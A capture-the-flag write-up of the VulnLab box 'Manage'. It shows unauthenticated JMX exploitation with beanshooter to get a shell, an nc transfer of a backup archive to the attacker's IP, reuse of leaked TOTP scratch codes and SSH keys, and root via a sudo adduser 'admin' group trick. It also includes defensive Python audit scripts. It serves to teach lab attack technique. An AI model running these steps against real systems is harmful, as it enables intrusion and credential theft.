
VulnLab Manage

Manage

Recon

└─$ rustscan -a 10.10.82.208 -r 1-65535                                                            
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
TCP handshake? More like a friendly high-five!

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 65435'.
Open 10.10.82.208:22
Open 10.10.82.208:2222
Open 10.10.82.208:8080
Open 10.10.82.208:42073
Open 10.10.82.208:39741
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-14 21:15 +05
Initiating Ping Scan at 21:15
Scanning 10.10.82.208 [4 ports]
Completed Ping Scan at 21:15, 0.13s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:15
Completed Parallel DNS resolution of 1 host. at 21:15, 0.07s elapsed
DNS resolution of 1 IPs took 0.07s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:15
Scanning 10.10.82.208 [5 ports]
Discovered open port 8080/tcp on 10.10.82.208
Discovered open port 22/tcp on 10.10.82.208
Discovered open port 42073/tcp on 10.10.82.208
Discovered open port 39741/tcp on 10.10.82.208
Discovered open port 2222/tcp on 10.10.82.208
Completed SYN Stealth Scan at 21:15, 0.11s elapsed (5 total ports)
Nmap scan report for 10.10.82.208
Host is up, received reset ttl 63 (0.090s latency).
Scanned at 2024-12-14 21:15:30 +05 for 0s

PORT      STATE SERVICE      REASON
22/tcp    open  ssh          syn-ack ttl 63
2222/tcp  open  EtherNetIP-1 syn-ack ttl 63
8080/tcp  open  http-proxy   syn-ack ttl 63
39741/tcp open  unknown      syn-ack ttl 63
42073/tcp open  unknown      syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds
           Raw packets sent: 9 (372B) | Rcvd: 6 (260B)

└─$ nmap -sC -sV -p22,2222,8080,39741,42073 10.10.82.208 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-14 21:16 +05
Nmap scan report for 10.10.82.208
Host is up (0.096s latency).

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 a9:36:3d:1d:43:62:bd:b3:88:5e:37:b1:fa:bb:87:64 (ECDSA)
|_  256 da:3b:11:08:81:43:2f:4c:25:42:ae:9b:7f:8c:57:98 (ED25519)
2222/tcp  open  java-rmi   Java RMI
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
| rmi-dumpregistry: 
|   jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub
|     @127.0.1.1:42073
|     extends
|       java.rmi.server.RemoteStub
|       extends
|_        java.rmi.server.RemoteObject
8080/tcp  open  http       Apache Tomcat 10.1.19
|_http-title: Apache Tomcat/10.1.19
|_http-favicon: Apache Tomcat
39741/tcp open  tcpwrapped
42073/tcp open  java-rmi   Java RMI
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.48 seconds

We find Apache Tomcat 10.1.19 running on port 8080, but nothing interesting there.

User

The most interesting port is 2222, which appears to be running Java RMI; the registry dump shows a jmxrmi bound name pointing at 127.0.1.1:42073. Material to read to understand RMI and JMX:

To enumerate the port, we will use beanshooter.

└─$ java -jar beanshooter-4.1.0-jar-with-dependencies.jar -h   
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
usage: beanshooter [-h]   ...

beanshooter v4.1.0 - a JMX enumeration and attacking tool

positional arguments:
                          
    attr                 set or get MBean attributes
    brute                bruteforce JMX credentials
    deploy               deploys the specified MBean on the JMX server
    enum                 enumerate the JMX service for common vulnerabilities
<SNIP>

Let's enumerate the JMX service:

└─$ java -jar beanshooter-4.1.0-jar-with-dependencies.jar enum 10.10.82.208 2222   
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] Checking available bound names:
[+]
[+]     * jmxrmi (JMX endpoint: 127.0.1.1:42073)
[+]
[+] Checking for unauthorized access:
[+]
[+]     - Remote MBean server does not require authentication.
[+]       Vulnerability Status: Vulnerable
[+]
[+] Checking pre-auth deserialization behavior:
[+]
[+]     - Remote MBeanServer rejected the payload class.
[+]       Vulnerability Status: Non Vulnerable
[+]
[+] Checking available MBeans:
[+]
[+]     - 171 MBeans are currently registred on the MBean server.
[+]       Listing 149 non default MBeans:
<SNIP>
[+]
[+] Enumerating tomcat users:
[+]
[+]     - Listing 2 tomcat users:
[+]
[+]             ----------------------------------------
[+]             Username:  manager
[+]             Password:  <REDACTED>
[+]             Roles:
[+]                        Users:type=Role,rolename="manage-gui",database=UserDatabase
[+]
[+]             ----------------------------------------
[+]             Username:  admin
[+]             Password:  <REDACTED>
[+]             Roles:
[+]                        Users:type=Role,rolename="role1",database=UserDatabase

We were able to retrieve the admin and manager Tomcat credentials. Since the MBean server requires no authentication, we can also try to get a shell with the same tool:

└─$ java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard 10.10.82.208 2222 tonka
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] Creating a TemplateImpl payload object to abuse StandardMBean
[+]
[+]     Deplyoing MBean: StandardMBean
[+]     MBean with object name de.qtc.beanshooter:standard=22016402736778 was successfully deployed.
[+]
[+]     Caught NullPointerException while invoking the newTransformer action.
[+]     This is expected bahavior and the attack most likely worked :)
[+]
[+]     Removing MBean with ObjectName de.qtc.beanshooter:standard=22016402736778 from the MBeanServer.
[+]     MBean was successfully removed.

└─$ java -jar beanshooter-4.1.0-jar-with-dependencies.jar tonka shell 10.10.82.208 2222      
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[tomcat@10.10.82.208 /]$ whoami
tomcat
[tomcat@10.10.82.208 /]$ 
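The root cause of this foothold is a remote JMX connector started with authentication switched off. As an added example (not from the post and not part of beanshooter), the following Python audit reads a JVM command line, as you would pull it from ps or /proc/<pid>/cmdline, and flags the weak com.sun.management.jmxremote settings; both sample command lines are constructed, the first mirroring what beanshooter reported and the second the hardened equivalent.

```python
import re
import shlex

PREFIX = "com.sun.management.jmxremote"
# Constructed sample JVM command lines (not taken from the target host). The
# first reproduces the weak setup beanshooter reported (remote JMX with
# authentication switched off); the second is the hardened equivalent.
SAMPLE_CMDLINES = {
    "weak": (
        "java -Dcom.sun.management.jmxremote "
        "-Dcom.sun.management.jmxremote.port=2222 "
        "-Dcom.sun.management.jmxremote.rmi.port=42073 "
        "-Dcom.sun.management.jmxremote.authenticate=false "
        "-Dcom.sun.management.jmxremote.ssl=false -jar tomcat.jar"
    ),
    "hardened": (
        "java -Dcom.sun.management.jmxremote.port=2222 "
        "-Dcom.sun.management.jmxremote.authenticate=true "
        "-Dcom.sun.management.jmxremote.password.file=/etc/jmx/jmxremote.password "
        "-Dcom.sun.management.jmxremote.access.file=/etc/jmx/jmxremote.access "
        "-Dcom.sun.management.jmxremote.ssl=true -jar tomcat.jar"
    ),
}

PROP_RE = re.compile(r"-D(" + re.escape(PREFIX) + r"(?:\.[\w.]+)?)(?:=(.*))?")

def jmx_props(cmdline):
    """Map each jmxremote* -D property to its value ("true" when no '=')."""
    props = {}
    for tok in shlex.split(cmdline):
        m = PROP_RE.fullmatch(tok)
        if m:
            props[m.group(1)] = "true" if m.group(2) is None else m.group(2)
    return props

def audit_jmx(cmdline):
    """Return weakness findings for a remote JMX connector ([] if none)."""
    p = jmx_props(cmdline)
    port = p.get(PREFIX + ".port")
    if port is None:
        return []  # no jmxremote.port: agent is local-only, nothing exposed
    findings = []
    # JDK defaults are authenticate=true and ssl=true, so only an explicit
    # "false" is reported.
    if p.get(PREFIX + ".authenticate", "true").lower() == "false":
        findings.append(f"JMX on port {port}: authentication disabled")
    if p.get(PREFIX + ".ssl", "true").lower() == "false":
        findings.append(f"JMX on port {port}: TLS disabled")
    return findings
```

Run it against every java process on a host to find connectors that beanshooter would report as "does not require authentication" before anyone else does.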

Now we need to move laterally. There are 2 users in the home directory, useradmin and karl. We tried the passwords found during JMX enumeration on karl without success. Trying the admin password on useradmin, however, produced a Verification code prompt:

tomcat@manage:/$ su useradmin
su useradmin
Password: <SNIP>
Verification code: 

In useradmin's home we find .google_authenticator (which we cannot read as tomcat) and a backups folder:

tomcat@manage:/home/useradmin$ ls -lha
ls -lha
total 36K
drwxr-xr-x 5 useradmin useradmin 4.0K Dec 14 17:06 .
drwxr-xr-x 4 root      root      4.0K Jun 21 15:46 ..
drwxrwxr-x 2 useradmin useradmin 4.0K Jun 21 16:51 backups
lrwxrwxrwx 1 useradmin useradmin    9 Jun 21 15:48 .bash_history -> /dev/null
-rw-r--r-- 1 useradmin useradmin  220 Jun 21 15:46 .bash_logout
-rw-r--r-- 1 useradmin useradmin 3.7K Jun 21 15:46 .bashrc
drwx------ 2 useradmin useradmin 4.0K Jun 21 16:48 .cache
-r-------- 1 useradmin useradmin  200 Dec 14 17:06 .google_authenticator
-rw-r--r-- 1 useradmin useradmin  807 Jun 21 15:46 .profile
drwxrwxr-x 2 useradmin useradmin 4.0K Jun 21 15:53 .ssh

Inside backups we find an archive; let's transfer it to our machine with nc:

tomcat@manage:/home/useradmin/backups$ ls -lha
ls -lha
total 12K
drwxrwxr-x 2 useradmin useradmin 4.0K Jun 21 16:51 .
drwxr-xr-x 5 useradmin useradmin 4.0K Dec 14 17:06 ..
-rw-rw-r-- 1 useradmin useradmin 3.1K Jun 21 16:50 backup.tar.gz
tomcat@manage:/home/useradmin/backups$ nc 10.8.4.147 6666 < backup.tar.gz
nc 10.8.4.147 6666 < backup.tar.gz

Inside it we find a copy of .google_authenticator and a .ssh directory with SSH keys:

└─$ cat .google_authenticator                                                                                                     
CLSSSMHYGLENX5HAIFBQ6L35UM
" RATE_LIMIT 3 30 1718988529
" WINDOW_SIZE 3
" DISALLOW_REUSE 57299617
" TOTP_AUTH
99852083
20312647
73235136
92971994
86175591
98991823
54032641
69267218
76839253
56800775

└─$ ls -lha .ssh    
total 20K
drwxrwxr-x 2 kali kali 4.0K Jun 21 20:53 .
drwxr-xr-x 5 kali kali 4.0K Jun 21 21:48 ..
-rw------- 1 kali kali   98 Jun 21 20:56 authorized_keys
-rw------- 1 kali kali  411 Jun 21 20:53 id_ed25519
-rw-r--r-- 1 kali kali   98 Jun 21 20:53 id_ed25519.pub

When we connect via SSH with the key, it still prompts for a verification code; entering one of the emergency scratch codes from the backed-up .google_authenticator gives us access:

└─$ ssh -i .ssh/id_ed25519 useradmin@10.10.82.208
The authenticity of host '10.10.82.208 (10.10.82.208)' can't be established.
ED25519 key fingerprint is SHA256:mTJofQVp4T/1uO1CFsfPt8SADZfjbzIIynR0Zeqi0qo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.82.208' (ED25519) to the list of known hosts.
(useradmin@10.10.82.208) Verification code: 
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sat Dec 14 05:15:31 PM UTC 2024

  System load:  0.0               Processes:             110
  Usage of /:   74.8% of 6.06GB   Users logged in:       0
  Memory usage: 41%               IPv4 address for ens5: 10.10.82.208
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Fri Jun 21 16:48:53 2024 from 192.168.94.139
useradmin@manage:~$ 

Root

useradmin can run adduser via sudo, but the argument is restricted by a regex to a single alphanumeric string, so options such as --system or --ingroup won't work.

useradmin@manage:~$ sudo -l
Matching Defaults entries for useradmin on manage:
    env_reset, timestamp_timeout=1440, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User useradmin may run the following commands on manage:
    (ALL : ALL) NOPASSWD: /usr/sbin/adduser ^[a-zA-Z0-9]+$

According to the hint for root, we have to check the default Ubuntu sudoers file:

<SNIP>
# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL
<SNIP>

There is no admin user or group yet, so adding one puts the new user into a freshly created admin group, which the %admin rule grants root privileges; that is enough to pwn the box.

useradmin@manage:~$ sudo /usr/sbin/adduser admin
Adding user `admin' ...
Adding new group `admin' (1003) ...
Adding new user `admin' (1003) with group `admin' ...
Creating home directory `/home/admin' ...
Copying files from `/etc/skel' ...
New password: 
Retype new password: 
passwd: password updated successfully
Changing the user information for admin
Enter the new value, or press ENTER for the default
        Full Name []: 
        Room Number []: 
        Work Phone []: 
        Home Phone []: 
        Other []: 
Is the information correct? [Y/n] y
useradmin@manage:~$ su admin
Password: 
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

admin@manage:/home/useradmin$ sudo su
[sudo] password for admin: 
root@manage:/home/useradmin# 
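The escalation works because a delegated adduser rule lets a user create an account whose freshly created primary group name matches a %group line in sudoers. As an added example, not part of the post, this Python check parses a sudoers excerpt for exactly that collision; the sudoers text and the set of existing groups are constructed samples, and the parsing regexes cover only the simple rule shapes quoted on the page.

```python
import re
# Constructed sudoers excerpt (not the box's real file): the delegated adduser
# rule from the post next to the stock Ubuntu %admin and %sudo lines.
SAMPLE_SUDOERS = """\
# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL
%sudo ALL=(ALL:ALL) ALL
useradmin ALL=(ALL : ALL) NOPASSWD: /usr/sbin/adduser ^[a-zA-Z0-9]+$
"""
# Constructed snapshot of the groups already present in /etc/group.
SAMPLE_EXISTING_GROUPS = {"root", "sudo", "useradmin", "tomcat", "karl"}

GROUP_RULE = re.compile(r"^%(?P<group>\S+)\s+\S+\s*=")
ADDUSER_RULE = re.compile(
    r"^(?P<who>[^%\s]\S*)\s+\S+\s*=\s*\([^)]*\)\s*(?:NOPASSWD:\s*)?"
    r"/\S*/adduser\s+(?P<arg>\^\S+\$)\s*$"
)

def _rules(text):
    """Yield sudoers lines with comments and surrounding whitespace removed."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            yield line

def privileged_groups(text):
    """Group names that get sudo rights through a %group entry."""
    return {m.group("group") for line in _rules(text)
            if (m := GROUP_RULE.match(line))}

def adduser_rules(text):
    """(user, argument-regex) pairs for delegated adduser rules."""
    return [(m.group("who"), m.group("arg")) for line in _rules(text)
            if (m := ADDUSER_RULE.match(line))]

def group_collisions(text, existing_groups):
    """(user, group) pairs where a delegated adduser call can create a user
    whose new private group is a privileged %group in sudoers."""
    # adduser makes a same-named private group for each new user; if that
    # name is absent from /etc/group but present as %group in sudoers, the
    # new user inherits the group's sudo rule. Sudo regexes carry their own
    # ^...$ anchors, so match() with the rule's own pattern is the test.
    hits = []
    for who, arg_regex in adduser_rules(text):
        pat = re.compile(arg_regex)
        for group in sorted(privileged_groups(text)):
            if group not in existing_groups and pat.match(group):
                hits.append((who, group))
    return hits
```

A rule that survives this check still deserves a tighter pattern (for example a fixed prefix that no sudoers group name can match) rather than a bare alphanumeric class.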

This post is licensed under CC BY 4.0 by the author.